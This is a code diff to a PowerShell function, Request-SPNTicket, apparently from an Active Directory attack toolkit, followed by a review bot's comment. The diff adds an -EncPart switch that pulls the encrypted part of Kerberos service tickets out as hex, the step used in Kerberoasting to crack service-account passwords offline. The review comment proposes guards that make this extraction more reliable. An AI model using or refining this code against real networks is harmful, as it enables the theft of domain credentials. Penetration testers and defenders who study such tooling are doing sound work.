@@ -1321,12 +1321,22 @@ function Request-SPNTicket {
13211321 . PARAMETER SPN
13221322
13231323 The service principal name to request the ticket for. Required.
1324+
1325+ . PARAMETER EncPart
1326+
1327+ Switch. Return the encrypted portion of the ticket (cipher).
13241328
13251329 . EXAMPLE
13261330
13271331 PS C:\> Request-SPNTicket -SPN "HTTP/web.testlab.local"
13281332
13291333 Request a kerberos service ticket for the specified SPN.
1334+
1335+ . EXAMPLE
1336+
1337+ PS C:\> Request-SPNTicket -SPN "HTTP/web.testlab.local" -EncPart
1338+
1339+ Request a kerberos service ticket for the specified SPN and return the encrypted portion of the ticket.
13301340
13311341 . EXAMPLE
13321342
@@ -1346,7 +1356,11 @@ function Request-SPNTicket {
13461356 [Parameter (Mandatory = $True , ValueFromPipelineByPropertyName = $True )]
13471357 [Alias (' ServicePrincipalName' )]
13481358 [String []]
1349- $SPN
1359+ $SPN ,
1360+
1361+ [Alias (' EncryptedPart' )]
1362+ [Switch ]
1363+ $EncPart
13501364 )
13511365
13521366 begin {
@@ -1356,7 +1370,20 @@ function Request-SPNTicket {
13561370 process {
13571371 ForEach ($UserSPN in $SPN ) {
13581372 Write-Verbose " Requesting ticket for: $UserSPN "
1359- New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken - ArgumentList $UserSPN
1373+ if (! $EncPart ) {
1374+ New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken - ArgumentList $UserSPN
1375+ }
1376+ else {
1377+ $Ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken - ArgumentList $UserSPN
1378+ $TicketByteStream = $Ticket.GetRequest ()
1379+ if ($TicketByteStream )
1380+ {
1381+ $TicketHexStream = [System.BitConverter ]::ToString($TicketByteStream ) -replace " -"
1382+ [System.Collections.ArrayList ]$Parts = ($TicketHexStream -replace ' ^(.*?)04820...(.*)' , ' $2' ) -Split " A48201"
1383+ $Parts.RemoveAt ($Parts.Count - 1 )
1384+ $Parts -join " A48201"
1385+ }
1386+ }
13601387 }
13611388 }
13621389}
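Review bot: In the `-EncPart` branch (new lines 1381–1384) nothing checks that either hex pattern was actually found, so a ticket with a different layout yields wrong or empty output without any message. `-replace` returns its input unchanged when `04820...` does not match, and if `A48201` never occurs the list holds one element, `RemoveAt` drops it, and the join emits an empty string; the patterns are also matched against a hex string, so a hit is not guaranteed to sit on a byte boundary. I would guard the extraction with `if ($TicketHexStream -notmatch '04820...' -or $TicketHexStream -notmatch 'A48201') { Write-Warning "Unexpected ticket layout for $UserSPN"; continue }` and add a `Write-Warning` in an `else` for the case where `GetRequest()` returns nothing. The help text should also state that this mode outputs a hex string rather than the `KerberosRequestorSecurityToken` object, since callers that pipe the result will see a different type.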